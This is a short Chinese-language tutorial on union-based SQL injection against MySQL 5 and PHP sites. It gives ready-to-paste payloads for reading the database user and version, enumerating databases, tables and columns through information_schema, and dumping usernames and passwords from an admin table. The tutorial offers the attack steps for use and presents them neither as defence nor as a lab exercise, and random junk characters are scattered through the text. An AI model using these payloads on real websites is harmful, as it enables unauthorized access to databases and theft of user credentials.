, m# I6 [ W6 `" N& R2 R
教程内容:Mysql 5+php 注入
8 g1 D" N9 n- b4 q
; s, l6 B' \! `' S/ t9 O, K& o% r9 C! J$ O2 F3 L9 L
& s% i% q u! o F& X4 Y j1 m& ?/ n一.查看MYSQL基本信息(库名,版本,用户)
' N! ^' t* L! G& ?# i0 R2 z+ T0 y. B2 y8 N: C
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
, L1 q8 L9 f! I: Y6 [/ j3 P% D9 N! F0 w, J( a) T! V9 m
二.查数据库
/ @: O6 @5 P) h" V2 m' M' ^, l3 I4 a4 G2 y7 \- h
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*$ i( O& y; K G. A# |# J
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
3 q1 b- R- P/ t$ k1 \* V
+ z# p7 D; ^) r三.暴表
" i+ G' C/ w0 r" G; A
* `+ F9 I: O7 g. mand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*) }. T; V9 w: F% ^
5 y5 ?5 T* B* ~7 _6 E7 f4 p8 D% e
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
, q. b' \& p; l$ d/ b/ `7 a! x" l1 d
) e6 {: _1 ?: }. W四.暴字段
; q' o3 S; L! t! I
5 x* l( O8 P" D$ p% fand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
( \/ W _: B p& C3 m
. w$ L6 z6 }7 O0 R& a+ K( B; Rlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
! F$ e. K) E' I( T" _. d" N/ l
! N) P, S! B' l. C' T$ O五.暴数据
9 u" K0 I! }6 c) s% e+ f+ W2 y; [" U
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*. P) ]0 a& }2 _3 J/ }
8 B e* _% m% ^/ o" {. K+ e
. L1 L9 _0 q' Q! b6 W( z
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
; A% c3 q" I H0 f. u |